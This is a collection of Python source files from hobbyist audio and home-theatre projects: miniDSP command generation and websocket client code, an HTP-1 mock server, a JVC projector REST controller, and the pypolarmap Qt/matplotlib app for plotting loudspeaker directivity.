@staticmethod
def bypass(channel: int, idx: int, bypass: bool, side: str = 'input'):
return f"{side} {channel} peq {idx} bypass {'on' if bypass else 'off'}"
@staticmethod
def mute(state: bool, slot: Optional[int], channel: Optional[int]):
'''
Generates commands to mute the configuration.
:param state: mute if true otherwise unmute.
:param slot: the target slot, if not set apply to the master control.
:param channel: the channel, applicable only if slot is set, if not set apply to both input channels.
:return: the commands.
'''
state_cmd = 'on' if state else 'off'
if slot is not None:
cmds = []
if channel is None:
cmds.append(f"input 0 mute {state_cmd}")
cmds.append(f"input 1 mute {state_cmd}")
else:
cmds.append(f"input {channel} mute {state_cmd}")
return cmds
else:
return [f"mute {state_cmd}"]
@staticmethod
def gain(gain: float, slot: Optional[int], channel: Optional[int]):
'''
Generates commands to set gain.
:param gain: the gain to set.
:param slot: the target slot, if not set apply to the master control.
:param channel: the channel, applicable only if slot is set, if not set apply to both input channels.
:return: the commands.
'''
if slot is not None:
if not -72.0 <= gain <= 12.0:
raise InvalidRequestError(f"Input gain {gain:.2f} out of range (>= -72.0 and <= 12.0)")
cmds = []
if channel is None:
cmds.append(f"input 0 gain -- {gain:.2f}")
cmds.append(f"input 1 gain -- {gain:.2f}")
else:
cmds.append(f"input {channel} gain -- {gain:.2f}")
return cmds
else:
if not -127.0 <= gain <= 0.0:
raise InvalidRequestError(f"Master gain {gain:.2f} out of range (>= -127.0 and <= 0.0)")
return [f"gain -- {gain:.2f}"]
@contextmanager
def tmp_file(cmds: List[str]):
import tempfile
tmp_name = None
try:
f = tempfile.NamedTemporaryFile(mode='w+', delete=False)
for cmd in cmds:
f.write(cmd)
f.write('\n')
tmp_name = f.name
f.close()
yield tmp_name
finally:
if tmp_name:
os.unlink(tmp_name)
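# Hedged usage sketch: tmp_file writes one command per line and deletes the file
# on exit, which is how __do_run hands a batch to the runner via '-f <file>':
#
#   with tmp_file(['config 0', 'mute off']) as file_name:
#       pass  # file_name now holds the two commands, one per line
#   # the temporary file has been unlinked by this point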
def to_millis(start, end, precision=1):
'''
    Calculates the difference in time in millis.
:param start: start time in seconds.
:param end: end time in seconds.
:return: delta in millis.
'''
return round((end - start) * 1000, precision)
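# e.g. to_millis(1.0, 1.2345) -> 234.5 (rounded to 1 decimal place by default)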
class MinidspRsClient:
def __init__(self, listener):
# TODO which device
self.__factory = MinidspRsClientFactory(listener, url='ws://localhost/devices/0?levels=true')
from twisted.internet.endpoints import clientFromString
from twisted.internet import reactor
wsclient = clientFromString(reactor, 'unix:path=/tmp/minidsp.sock:timeout=5')
self.__connector = wsclient.connect(self.__factory)
def send(self, msg: str):
self.__factory.broadcast(msg)
class MinidspRsProtocol(WebSocketClientProtocol):
def onConnecting(self, transport_details):
logger.info(f"Connecting to {transport_details}")
def onConnect(self, response):
logger.info(f"Connected to {response.peer}")
self.sendMessage('getmso'.encode('utf-8'), isBinary=False)
def onOpen(self):
logger.info("Connected to Minidsp")
self.factory.register(self)
def onClose(self, was_clean, code, reason):
if was_clean:
logger.info(f"Disconnected code: {code} reason: {reason}")
else:
logger.warning(f"UNCLEAN! Disconnected code: {code} reason: {reason}")
def onMessage(self, payload, is_binary):
if is_binary:
logger.warning(f"Received {len(payload)} bytes in binary payload, ignoring")
else:
msg = payload.decode('utf8')
logger.info(f"Received {msg}")
# self.factory.listener.on_msoupdate(json.loads(msg[10:]))
class MinidspRsClientFactory(WebSocketClientFactory, ReconnectingClientFactory):
protocol = MinidspRsProtocol
maxDelay = 5
initialDelay = 0.5
def __init__(self, listener, *args, **kwargs):
super(MinidspRsClientFactory, self).__init__(*args, **kwargs)
self.__clients: List[MinidspRsProtocol] = []
self.listener = listener
def clientConnectionFailed(self, connector, reason):
logger.warning(f"Client connection failed {reason} .. retrying ..")
super().clientConnectionFailed(connector, reason)
def clientConnectionLost(self, connector, reason):
logger.warning(f"Client connection failed {reason} .. retrying ..")
super().clientConnectionLost(connector, reason)
def register(self, client: MinidspRsProtocol):
if client not in self.__clients:
logger.info(f"Registered device {client.peer}")
self.__clients.append(client)
else:
logger.info(f"Ignoring duplicate device {client.peer}")
def unregister(self, client: MinidspRsProtocol):
if client in self.__clients:
logger.info(f"Unregistering device {client.peer}")
self.__clients.remove(client)
else:
logger.info(f"Ignoring unregistered device {client.peer}")
def broadcast(self, msg):
if self.__clients:
disconnected_clients = []
for c in self.__clients:
logger.info(f"Sending to {c.peer} - {msg}")
try:
c.sendMessage(msg.encode('utf8'))
except Disconnected as e:
logger.exception(f"Failed to send to {c.peer}, discarding")
disconnected_clients.append(c)
for c in disconnected_clients:
self.unregister(c)
else:
raise ValueError(f"No devices connected, ignoring {msg}")
``` |
{
"source": "3ll3d00d/htp1mock",
"score": 3
} |
#### File: htp1mock/htp1mock/__main__.py
```python
import asyncio
import websockets
import json
CHANNELS = ['lf', 'rf', 'c', 'sub1', 'sub2', 'sub3', 'ls', 'rs']
class Htp1:
def __init__(self):
self.__bands = {
'peq': {
'slots': [
{
'checksum': None,
'channels': {c: self.__make_peq() for c in CHANNELS}
} for i in range(16)
]
}
}
self.__conns = set()
@staticmethod
def __make_peq(fc=120, gain=0, q=1):
return {
'Fc': fc,
'gaindB': gain,
'Q': q
}
async def on_msg(self, websocket, path):
while True:
try:
data = await websocket.recv()
except websockets.ConnectionClosed:
print(f"Closed")
break
print(f"< {data}")
if data.startswith('changemso'):
print(f"Handling {data}")
for operation in json.loads(data[9:]):
handled = False
if operation['op'] == 'replace':
tokens = [t for t in operation['path'].split('/') if t]
if len(tokens) == 6:
slots = self.__bands['peq']['slots']
slot_idx = int(tokens[2])
if len(slots) > slot_idx:
slot = slots[slot_idx]['channels']
if tokens[4] in slot:
channel_filter = slot[tokens[4]]
if tokens[5] in channel_filter:
channel_filter[tokens[5]] = operation['value']
print(f"Updated slot {tokens[2]}/{tokens[4]} to {channel_filter}")
handled = True
if not handled:
print(f"Unable to handle {operation}")
elif data == 'getmso':
pass # nop
else:
print(f"Ignoring {path} {data}")
await websocket.send(f"mso {json.dumps(self.__bands)}")
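# Minimal protocol sketch, inferred from the handler above (values illustrative):
# a client adjusts a PEQ band with a JSON-patch style payload such as
#   changemso [{"op": "replace", "path": "/peq/slots/0/channels/lf/Fc", "value": 80}]
# and every inbound message is answered with the full state as 'mso {...}'.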
def main():
htp1 = Htp1()
start_server = websockets.serve(htp1.on_msg, "localhost", 8765)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
if __name__ == '__main__':
main()
``` |
{
"source": "3ll3d00d/pyjvcpj",
"score": 3
} |
#### File: pyjvcpj/src/pjcontroller.py
```python
import sys
import logging
from enum import Enum
from debounce import debounce
from jvc import CommandExecutor
from jvccommands import Command, load_all_commands, Numeric
logger = logging.getLogger('pyjvcpj.pjcontroller')
class PJController:
def __init__(self, config):
self.__pj_macros = config.pj_macros
self.__executor = CommandExecutor(host=config.pj_ip)
self.__commands = load_all_commands()
def __connect(self):
self.__executor.connect()
@debounce(4)
def __disconnect(self):
self.__executor.disconnect(fail=False)
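    # Note: __disconnect is wrapped in @debounce(4) above, so back-to-back
    # requests share one connection and the socket is only closed once calls
    # stop arriving (the 4 is assumed to be the debounce window in seconds).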
def get(self, command):
try:
cmd = Command[command]
self.__connect()
val = self.__executor.get(cmd)
self.__disconnect()
if val is not None and isinstance(val, Enum):
return val.name
return val
except KeyError:
logger.warning(f"Ignoring unknown command {command}")
return None
except:
logger.exception(f"Unexpected failure while executing {command}")
return None
def send(self, commands):
""" Sends the commands to the PJ """
vals = []
self.__connect()
for command in commands:
if command in self.__pj_macros:
for cmd in self.__pj_macros[command]:
vals.append(self.__execute(cmd))
else:
vals.append(self.__execute(command))
self.__disconnect()
return vals
def __execute(self, cmd):
tokens = cmd.split('.')
if len(tokens) > 1:
try:
cmd_enum = Command[tokens[0]]
if isinstance(cmd_enum.value, tuple):
cmd_arg_enum = cmd_enum.value[1]
if cmd_arg_enum.__name__ == tokens[1]:
logger.info(f"Executing {cmd}")
if issubclass(cmd_arg_enum, Enum):
return self.__executor.set(cmd_enum, cmd_arg_enum[tokens[2]])
elif issubclass(cmd_arg_enum, Numeric):
return self.__executor.set(cmd_enum, Numeric(int(tokens[2])))
else:
logger.warning(f"Unsupported value type for {cmd} - {cmd_arg_enum.__name__}")
except (AttributeError, KeyError):
logger.warning(f"Ignoring unknown command {cmd}")
except:
logger.exception(f"Unexpected exception while processing {cmd}")
logger.error(f"Ignoring unknown command {cmd}")
```
#### File: pyjvcpj/src/pyjvcpj.py
```python
import faulthandler
from os import path
from flask import Flask
from flask_restful import Api
from pj import PJ, UpdatePJ, Info
from pjcontroller import PJController
from config import Config
API_PREFIX = '/api/1'
faulthandler.enable()
if hasattr(faulthandler, 'register'):
import signal
faulthandler.register(signal.SIGUSR2, all_threads=True)
app = Flask(__name__)
api = Api(app)
cfg = Config('pyjvcpj')
resource_args = {
'pj_controller': PJController(cfg)
}
if cfg.pj_ip is None:
raise AttributeError("pjip must be set in {self.config_file}")
# GET: get info
api.add_resource(Info, API_PREFIX + '/info', resource_class_kwargs=resource_args)
# GET: read only command
api.add_resource(PJ, API_PREFIX + '/pj/<command>', resource_class_kwargs=resource_args)
# PUT: write command
api.add_resource(UpdatePJ, API_PREFIX + '/pj', resource_class_kwargs=resource_args)
def main(args=None):
""" The main routine. """
logger = cfg.configure_logger()
if cfg.use_twisted:
import logging
logger = logging.getLogger('twisted')
from twisted.internet import reactor
from twisted.web.resource import Resource
from twisted.web import server
from twisted.web.wsgi import WSGIResource
from twisted.application import service
from twisted.internet import endpoints
class FlaskAppWrapper(Resource):
"""
            wraps the flask app as a WSGI resource while allowing the react index.html (and its associated
            static content) to be served as the default page.
"""
def __init__(self):
super().__init__()
self.wsgi = WSGIResource(reactor, reactor.getThreadPool(), app)
def getChild(self, path, request):
"""
Overrides getChild to allow the request to be routed to the wsgi app (i.e. flask for the rest api
calls), the static dir (i.e. for the packaged css/js etc), the various concrete files (i.e. the public
dir from react-app), the command icons or to index.html (i.e. the react app) for everything else.
:param path:
:param request:
:return:
"""
# allow CORS (CROSS-ORIGIN RESOURCE SHARING) for debug purposes
request.setHeader('Access-Control-Allow-Origin', '*')
request.setHeader('Access-Control-Allow-Methods', 'GET, PUT')
request.setHeader('Access-Control-Allow-Headers', 'x-prototype-version,x-requested-with')
request.setHeader('Access-Control-Max-Age', '2520') # 42 hours
logger.debug(f"Handling {path}")
if path == b'api':
request.prepath.pop()
request.postpath.insert(0, path)
return self.wsgi
else:
return None
def render(self, request):
return self.wsgi.render(request)
application = service.Application('pyjvcpj')
if cfg.is_access_logging is True:
site = server.Site(FlaskAppWrapper(), logPath=path.join(cfg.config_path, 'access.log').encode())
else:
site = server.Site(FlaskAppWrapper())
endpoint = endpoints.TCP4ServerEndpoint(reactor, cfg.port, interface='0.0.0.0')
endpoint.listen(site)
reactor.run()
else:
# get config from a flask standard place not our config yml
app.run(debug=cfg.run_in_debug, host='0.0.0.0', port=cfg.port, use_reloader=False)
if __name__ == '__main__':
main()
``` |
{
"source": "3ll3d00d/pypolarmap",
"score": 2
} |
#### File: main/python/app.py
```python
import logging
import math
import os
import sys
from contextlib import contextmanager
import matplotlib
from matplotlib.colors import LinearSegmentedColormap
matplotlib.use("Qt5Agg")
from qtpy.QtCore import QSettings
from qtpy.QtGui import QIcon, QFont, QCursor
from qtpy.QtWidgets import QMainWindow, QFileDialog, QDialog, QMessageBox, QApplication, QErrorMessage
from model.contour import ContourModel
from model.display import DisplayModel, DisplayControlDialog
from model.load import NFSLoader
from model.log import RollingLogger
from model.multi import MultiChartModel
from model.preferences import Preferences
from ui.pypolarmap import Ui_MainWindow
from ui.savechart import Ui_saveChartDialog
from model import magnitude as mag, measurement as m
from qtpy import QtCore, QtWidgets
from matplotlib.figure import Figure
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as Canvas
import colorcet as cc
logger = logging.getLogger('pypolarmap')
# from http://colorcet.pyviz.org/index.html
inverse = {}
for k, v in cc.cm_n.items():
if not k[-2:] == "_r":
inverse[v] = inverse.get(v, [])
inverse[v].insert(0, k)
all_cms = sorted({', '.join(reversed(v)): k for (k, v) in inverse.items()}.items())
cms_by_name = dict(all_cms)
cms_by_name['custom'] = LinearSegmentedColormap.from_list('custom', ['black', 'magenta', 'blue', 'cyan', 'lime', 'yellow', 'red', 'white'])
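# Hedged sketch of the mapping built above (exact keys depend on the installed
# colorcet version): each colormap is keyed by the comma-joined list of its
# non-reversed aliases, e.g. something like
#   cms_by_name['rainbow, rainbow_bgyr_35_85_c73'] -> <colorcet colormap>
# plus the hand-built 'custom' black-to-white ramp registered on the last line.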
# Matplotlib canvas class to create figure
class MplCanvas(Canvas):
def __init__(self):
self.figure = Figure(tight_layout=True)
Canvas.__init__(self, self.figure)
Canvas.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
Canvas.updateGeometry(self)
# Matplotlib widget
class MplWidget(QtWidgets.QWidget):
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.canvas = MplCanvas()
self.vbl = QtWidgets.QVBoxLayout()
self.vbl.addWidget(self.canvas)
self.setLayout(self.vbl)
self.__cmap = self.get_colour_map('rainbow')
def get_colour_map(self, name):
return cms_by_name.get(name, cms_by_name.get('bgyw'))
def get_colour(self, idx, count):
'''
:param idx: the colour index.
:return: the colour at that index.
'''
return self.__cmap(idx / count)
class SaveChartDialog(QDialog, Ui_saveChartDialog):
'''
Save Chart dialog
'''
def __init__(self, parent, selectedGraph, statusbar):
super(SaveChartDialog, self).__init__(parent)
self.setupUi(self)
self.chart = selectedGraph
fig = self.chart._chart.canvas.figure
self.__dpi = fig.dpi
self.__x, self.__y = fig.get_size_inches() * fig.dpi
self.__aspectRatio = self.__x / self.__y
self.widthPixels.setValue(self.__x)
self.heightPixels.setValue(self.__y)
self.statusbar = statusbar
self.__dialog = QFileDialog(parent=self)
def accept(self):
formats = "Portable Network Graphic (*.png)"
fileName = self.__dialog.getSaveFileName(self, 'Export Chart', f"{self.chart.name}.png", formats)
if fileName:
outputFile = str(fileName[0]).strip()
if len(outputFile) == 0:
return
else:
scaleFactor = self.widthPixels.value() / self.__x
self.chart._chart.canvas.figure.savefig(outputFile, format='png', dpi=self.__dpi * scaleFactor)
self.statusbar.showMessage(f"Saved {self.chart.name} to {outputFile}", 5000)
QDialog.accept(self)
def updateHeight(self, newWidth):
'''
Updates the height as the width changes according to the aspect ratio.
:param newWidth: the new width.
'''
self.heightPixels.setValue(int(math.floor(newWidth / self.__aspectRatio)))
class PyPolarmap(QMainWindow, Ui_MainWindow):
'''
The main UI.
'''
def __init__(self, app, parent=None):
super(PyPolarmap, self).__init__(parent)
self.app = app
self.preferences = Preferences(QSettings("3ll3d00d", "pypolarmap"))
self.setupUi(self)
self.logViewer = RollingLogger(self, self.preferences)
self.logger = logging.getLogger('pypolarmap')
if getattr(sys, 'frozen', False):
self.__root_path = sys._MEIPASS
else:
self.__root_path = os.path.dirname(__file__)
self.__version = 'UNKNOWN'
try:
with open(os.path.join(self.__root_path, 'VERSION')) as version_file:
self.__version = version_file.read().strip()
except:
logger.exception('Unable to load version')
# menus
self.actionLoad.triggered.connect(self.selectDirectory)
self.actionSave_Current_Image.triggered.connect(self.saveCurrentChart)
self.actionShow_Logs.triggered.connect(self.logViewer.show_logs)
self.actionAbout.triggered.connect(self.showAbout)
self.__display_model = DisplayModel(self.preferences)
self.__measurement_model = m.MeasurementModel(self.__display_model)
self.__display_model.measurement_model = self.__measurement_model
# measured graphs
self.__measured_multi_model = MultiChartModel(self.measuredMultiGraph, self.__measurement_model,
self.__display_model, self.preferences)
self.__measured_polar_model = ContourModel(self.measuredPolarGraph, self.__measurement_model,
self.__display_model, self.preferences)
self.__measured_magnitude_model = mag.MagnitudeModel(self.measuredMagnitudeGraph, self.__measurement_model,
self.__display_model,
selector=self.measuredMagnitudeCurves)
self.__display_model.results_charts = [self.__measured_multi_model, self.__measured_polar_model,
self.__measured_magnitude_model]
self.__measurement_list_model = m.MeasurementListModel(self.__measurement_model, parent=parent)
self.action_Display.triggered.connect(self.show_display_controls_dialog)
def showAbout(self):
''' Shows the about dialog '''
msg_box = QMessageBox()
msg_box.setText(
f"<a href='https://github.com/3ll3d00d/pypolarmap'>pypolarmap</a> v{self.__version} by 3ll3d00d")
msg_box.setIcon(QMessageBox.Information)
msg_box.setWindowTitle('About')
msg_box.exec()
def show_display_controls_dialog(self):
'''
Shows the parameters dialog.
'''
DisplayControlDialog(self, self.__display_model, self.__measurement_model).show()
def setupUi(self, mainWindow):
super().setupUi(self)
geometry = self.preferences.get("geometry")
        if geometry is not None:
self.restoreGeometry(geometry)
else:
screenGeometry = self.app.desktop().availableGeometry()
if screenGeometry.height() < 800:
self.showMaximized()
windowState = self.preferences.get("windowState")
        if windowState is not None:
self.restoreState(windowState)
def closeEvent(self, *args, **kwargs):
'''
Saves the window state on close.
:param args:
:param kwargs:
'''
self.preferences.set("geometry", self.saveGeometry())
self.preferences.set("windowState", self.saveState())
super().closeEvent(*args, **kwargs)
self.app.closeAllWindows()
# signal handlers
def selectDirectory(self):
'''
Triggered by the select directory button. Shows a file dialog which allows a user to select a directory which is
used to load the set of measurements which is then passed to the various models.
:return:
'''
selected = QFileDialog.getOpenFileName(parent=self, caption='Select NFS File', filter='Filter (*.txt)')
        if selected is not None and len(selected[0]) > 0:
self.__measurement_model.load(NFSLoader(selected[0]).load())
self.graphTabs.setEnabled(True)
self.graphTabs.setCurrentIndex(0)
self.graphTabs.setTabEnabled(0, True)
self.enable_analysed_tabs()
self.onGraphTabChange()
else:
            self.__measurement_model.clear()
self.graphTabs.setCurrentIndex(0)
self.graphTabs.setEnabled(False)
def saveCurrentChart(self):
'''
Saves the currently selected chart to a file.
'''
selectedGraph = self.getSelectedGraph()
dialog = SaveChartDialog(self, selectedGraph, self.statusbar)
dialog.exec()
def getSelectedGraph(self):
idx = self.graphTabs.currentIndex()
if idx == 0:
return self.__measured_magnitude_model
elif idx == 1:
return self.__measured_polar_model
elif idx == 2:
return self.__measured_multi_model
else:
return None
def onGraphTabChange(self):
'''
Updates the visible chart.
'''
self.__display_model.visible_chart = self.getSelectedGraph()
def disable_analysed_tabs(self):
''' Disables all tabs that depend on the impulse analysis '''
for idx in range(0, self.graphTabs.count()):
self.graphTabs.setTabEnabled(idx, False)
def enable_analysed_tabs(self):
''' Enables all tabs that depend on the impulse analysis '''
for idx in range(0, self.graphTabs.count()):
self.graphTabs.setTabEnabled(idx, True)
e_dialog = None
def main():
app = QApplication(sys.argv)
if getattr(sys, 'frozen', False):
iconPath = os.path.join(sys._MEIPASS, 'Icon.ico')
else:
        iconPath = os.path.abspath(os.path.join(os.path.dirname(__file__), '../icons/Icon.ico'))
if os.path.exists(iconPath):
app.setWindowIcon(QIcon(iconPath))
form = PyPolarmap(app)
# setup the error handler
global e_dialog
e_dialog = QErrorMessage(form)
e_dialog.setWindowModality(QtCore.Qt.WindowModal)
font = QFont()
font.setFamily("Consolas")
font.setPointSize(8)
e_dialog.setFont(font)
form.show()
app.exec_()
# display exceptions in a QErrorMessage so the user knows what just happened
sys._excepthook = sys.excepthook
def dump_exception_to_log(exctype, value, tb):
import traceback
if e_dialog is not None:
        formatted = traceback.format_exception(exctype, value, tb)
msg = '<br>'.join(formatted)
e_dialog.setWindowTitle('Unexpected Error')
e_dialog.showMessage(msg)
e_dialog.resize(1200, 400)
else:
print(exctype, value, tb)
sys.excepthook = dump_exception_to_log
if __name__ == '__main__':
main()
@contextmanager
def wait_cursor(msg=None):
'''
Allows long running functions to show a busy cursor.
:param msg: a message to put in the status bar.
'''
try:
QApplication.setOverrideCursor(QCursor(QtCore.Qt.WaitCursor))
yield
finally:
QApplication.restoreOverrideCursor()
```
#### File: python/model/contour.py
```python
import logging
import math
import numpy as np
from matplotlib import animation
from model import configureFreqAxisFormatting, calculate_dBFS_Scales, colorbar, SINGLE_SUBPLOT_SPEC
from model.measurement import CLEAR_MEASUREMENTS, LOAD_MEASUREMENTS
from model.preferences import DISPLAY_COLOUR_MAP
logger = logging.getLogger('contour')
class ContourModel:
'''
Allows a set of FRs to be displayed as a directivity sonargram.
'''
def __init__(self, chart, measurement_model, display_model, preferences,
subplot_spec=SINGLE_SUBPLOT_SPEC, redraw_on_display=True, depends_on=lambda: False,
show_crosshairs=False):
'''
Creates a new contour model.
:param chart: the MplWidget that owns the canvas onto which the chart will be drawn.
:param measurement_model: the underlying measurements.
:param subplot_spec: the spec for the subplot, defaults to a single plot.
        :param redraw_on_display: whether to redraw the canvas when the chart is displayed.
'''
self.__chart = chart
self.__axes = None
self.__crosshair_axes = None
self.__show_crosshairs = show_crosshairs
self.__subplot_spec = subplot_spec
self.__init_chart(subplot_spec)
self.__measurement_model = measurement_model
self.__depends_on = depends_on
self.__selected_cmap = preferences.get(DISPLAY_COLOUR_MAP)
self.__cmap_changed = False
self.name = 'contour'
self.__data = None
self.__tc = None
self.__tcf = None
self.__cid = []
self.__refresh_data = False
self.__measurement_model.register_listener(self)
self.__record_y = False
self.__dragging = False
self.cursor_x = None
self.cursor_y = None
self.__crosshair_h = None
self.__crosshair_v = None
self.__ani = None
self.__redraw_on_display = redraw_on_display
self.__display_model = display_model
self.__required_clim = None
self.__extents = []
def __repr__(self):
return self.name
def should_refresh(self):
        return self.__refresh_data or self.__depends_on()
def __init_chart(self, subplotSpec):
'''
Initialises the chart with the default configuration.
:param subplotSpec: the spec for the subplot.
'''
if self.__axes is None:
self.__axes = self.__chart.canvas.figure.add_subplot(subplotSpec)
if self.__show_crosshairs is True and self.__crosshair_axes is None:
self.__crosshair_axes = self.__axes.twinx()
self.__crosshair_axes.get_yaxis().set_visible(False)
self.__axes.axis('auto')
self.__axes.set_xscale('log')
self.__axes.set_xlabel('Hz')
self.__axes.set_ylabel('Degrees')
self.__axes.grid(linestyle='-', which='major', linewidth=1, alpha=0.5)
self.__axes.grid(linestyle='--', which='minor', linewidth=1, alpha=0.5)
def update_decibel_range(self, draw=True):
'''
Updates the decibel range on the chart.
'''
# record the target clim in case we don't want to draw right now
if self.__tcf is not None:
_, cmax = self.__tcf.get_clim()
self.__required_clim = (cmax - self.__display_model.db_range, cmax)
self.__tcf.set_clim(vmin=self.__required_clim[0], vmax=self.__required_clim[1])
if draw:
self.__required_clim = None
self.__chart.canvas.draw_idle()
def on_update(self, type, **kwargs):
'''
Handles events from the measurement model.
:param type: the type.
:param kwargs: any additional args.
:return:
'''
if type == LOAD_MEASUREMENTS:
self.__refresh_data = True
elif type == CLEAR_MEASUREMENTS:
self.clear()
def display(self):
'''
Updates the contents of the chart. This occurs if we need to recalculate the plot data (i.e. if the underlying
data has changed) or if we are redisplaying this chart and the y range has changed since it was last visible.
:return: true if it redrew.
'''
if len(self.__measurement_model) > 0:
if self.__refresh_data:
self.__data = self.__measurement_model.get_contour_data()
self.__extents = [np.nanmin(self.__data['x']), np.nanmax(self.__data['x']),
np.nanmax(self.__data['y']), np.nanmin(self.__data['y'])]
if self.__tcf:
self.clear(disconnect=False)
self.__redraw()
self.connect_mouse()
if self.__redraw_on_display:
self.__chart.canvas.draw_idle()
self.__refresh_data = False
return True
else:
# this is called when the owning tab is selected so we need to update the clim if the y range
# was changed while this chart was off screen
if self.__tcf is not None and self.__required_clim is not None:
self.update_decibel_range(draw=self.__redraw_on_display)
return self.__redraw_on_display
if self.__cmap_changed:
self.__chart.canvas.draw_idle()
self.__cmap_changed = False
return False
def __redraw(self):
'''
draws the contours and the colorbar.
:return:
'''
vmax, vmin, steps, fill_steps = calculate_dBFS_Scales(self.__data['z'],
max_range=self.__display_model.db_range,
vmax_to_round=False)
        actual_vmax = math.ceil(np.nanmax(self.__data['z']))
line_offset = actual_vmax - vmax
line_steps = steps + line_offset
self.__tc = self.__axes.tricontour(self.__data['x'], self.__data['y'], self.__data['z'],
line_steps if not self.__display_model.normalised else line_steps - np.max(line_steps) - 2,
linewidths=0.5, colors='k', linestyles='--')
self.__tc = self.__axes.tricontour(self.__data['x'], self.__data['y'], self.__data['z'],
levels=[actual_vmax - 6] if not self.__display_model.normalised else [-6],
linewidths=1.5, colors='k')
self.__tcf = self.__axes.tricontourf(self.__data['x'], self.__data['y'], self.__data['z'], fill_steps,
vmin=vmin, vmax=vmax,
cmap=self.__chart.get_colour_map(self.__selected_cmap))
self._cb = colorbar(self.__tcf)
self._cb.set_ticks(steps)
configureFreqAxisFormatting(self.__axes)
self.__tcf.set_clim(vmin=vmin, vmax=vmax)
if self.__crosshair_axes is not None:
xlim = self.__axes.get_xlim()
ylim = self.__axes.get_ylim()
self.__crosshair_axes.set_xlim(left=xlim[0], right=xlim[1])
self.__crosshair_axes.set_ylim(bottom=ylim[0], top=ylim[1])
self.__crosshair_h = self.__crosshair_axes.axhline(color='k', linestyle=':')
self.__crosshair_v = self.__crosshair_axes.axvline(color='k', linestyle=':')
if self.__ani is None:
logger.info(f"Starting animation in {self.name}")
self.__ani = animation.FuncAnimation(self.__chart.canvas.figure, self.__redraw_crosshairs, interval=50,
init_func=self.__init_crosshairs, blit=True, save_count=50, repeat=False)
def __init_crosshairs(self):
self.__crosshair_h.set_ydata([self.__extents[3], self.__extents[3]])
self.__crosshair_v.set_xdata([self.__extents[0], self.__extents[0]])
return self.__crosshair_h, self.__crosshair_v
def __redraw_crosshairs(self, frame, *fargs):
if self.cursor_y is not None:
self.__crosshair_h.set_ydata([self.cursor_y] * 2)
if self.cursor_x is not None:
self.__crosshair_v.set_xdata([self.cursor_x] * 2)
return self.__crosshair_h, self.__crosshair_v
def recordDataCoords(self, event):
'''
Records the current location of the mouse
:param event: the event.
'''
if event is not None and self.__record_y and self.__dragging:
self.cursor_x = event.xdata
self.cursor_y = event.ydata
def enterAxes(self, event):
'''
Start recording the y position if the mouse is in the contour plot.
:param event: the location event.
'''
        self.__record_y = event.inaxes is self.__axes or event.inaxes is self.__crosshair_axes
def leaveAxes(self, event):
'''
Stop recording the y position if the mouse leaves the contour plot.
:param event: the location event.
'''
if event.inaxes is self.__axes:
self.__record_y = False
def connect_mouse(self):
'''
Ensure that the y position is recorded when the mouse moves around the contour map.
:return:
'''
if self.__cid is None or len(self.__cid) == 0:
self.__cid.append(self.__chart.canvas.mpl_connect('motion_notify_event', self.recordDataCoords))
self.__cid.append(self.__chart.canvas.mpl_connect('button_press_event', self.depress))
self.__cid.append(self.__chart.canvas.mpl_connect('button_release_event', self.release))
self.__cid.append(self.__chart.canvas.mpl_connect('axes_enter_event', self.enterAxes))
self.__cid.append(self.__chart.canvas.mpl_connect('axes_leave_event', self.leaveAxes))
def depress(self, event):
if not event.dblclick:
self.__dragging = True
def release(self, event):
self.__dragging = False
def update_colour_map(self, cmap_name, draw=True):
'''
Updates the currently selected colour map.
:param cmap_name: the cmap name.
'''
if cmap_name != self.__selected_cmap:
self.__selected_cmap = cmap_name
if self.__tcf:
cmap = self.__chart.get_colour_map(cmap_name)
self.__tcf.set_cmap(cmap)
if draw:
self.__chart.canvas.draw_idle()
else:
self.__cmap_changed = True
def clear(self, disconnect=True, draw=True):
'''
clears the graph and disconnects the handlers
'''
if self.__tcf:
if disconnect:
for cid in self.__cid:
self.__chart.canvas.mpl_disconnect(cid)
self.__cid = []
self.stop_animation()
self._cb.remove()
self.__axes.clear()
if self.__crosshair_axes is not None:
self.__crosshair_axes.clear()
self.__tc = None
self.__tcf = None
self.__init_chart(self.__subplot_spec)
self.__refresh_data = True
if draw:
self.__chart.canvas.draw_idle()
def stop_animation(self):
'''
Stops the animation.
'''
if self.__ani is not None:
logger.info(f"Stopping animation in {self.name}")
ani = self.__ani
self.__ani = None
ani._stop()
```
#### File: python/model/display.py
```python
from PyQt5.QtWidgets import QDialog, QDialogButtonBox
from model.preferences import DISPLAY_DB_RANGE, DISPLAY_COLOUR_MAP, DISPLAY_POLAR_360
from ui.display import Ui_displayControlsDialog
class DisplayModel:
'''
Parameters to feed into how a chart should be displayed.
'''
def __init__(self, preferences):
self.__preferences = preferences
self.__db_range = self.__preferences.get(DISPLAY_DB_RANGE)
self.__normalised = False
self.__normalisation_angle = 0
self.__visible_chart = None
self.__colour_map = self.__preferences.get(DISPLAY_COLOUR_MAP)
self.__locked = False
self.__full_polar_range = self.__preferences.get(DISPLAY_POLAR_360)
self.results_charts = []
self.measurement_model = None
def __repr__(self):
return self.__class__.__name__
@property
def colour_map(self):
return self.__colour_map
def accept(self, colour_map, db_range, is_normalised, normalisation_angle, full_polar_range):
self.lock()
should_refresh = False
norm_change = False
if self.__colour_map != colour_map:
self.__colour_map = colour_map
for chart in self.results_charts:
if hasattr(chart, 'update_colour_map'):
chart.update_colour_map(self.__colour_map, draw=False)
self.__preferences.set(DISPLAY_COLOUR_MAP, colour_map)
should_refresh = True
if self.__db_range != db_range:
self.__db_range = db_range
for chart in self.results_charts:
chart.update_decibel_range(draw=False)
self.__preferences.set(DISPLAY_DB_RANGE, db_range)
should_refresh = True
if self.__normalised != is_normalised:
self.__normalised = is_normalised
should_refresh = True
norm_change = True
if full_polar_range != self.__full_polar_range:
self.__full_polar_range = full_polar_range
should_refresh = True
if normalisation_angle != self.__normalisation_angle:
self.__normalisation_angle = normalisation_angle
if self.__normalised:
norm_change = True
should_refresh = True
if norm_change:
self.measurement_model.normalisation_changed()
self.unlock(should_refresh)
@property
def db_range(self):
return self.__db_range
@property
def normalised(self):
return self.__normalised
@property
def normalisation_angle(self):
return self.__normalisation_angle
@property
def full_polar_range(self):
return self.__full_polar_range
@property
def visible_chart(self):
return self.__visible_chart
@visible_chart.setter
def visible_chart(self, visible_chart):
if self.__visible_chart is not None and getattr(self.__visible_chart, 'hide', None) is not None:
self.__visible_chart.hide()
self.__visible_chart = visible_chart
self.redraw_visible()
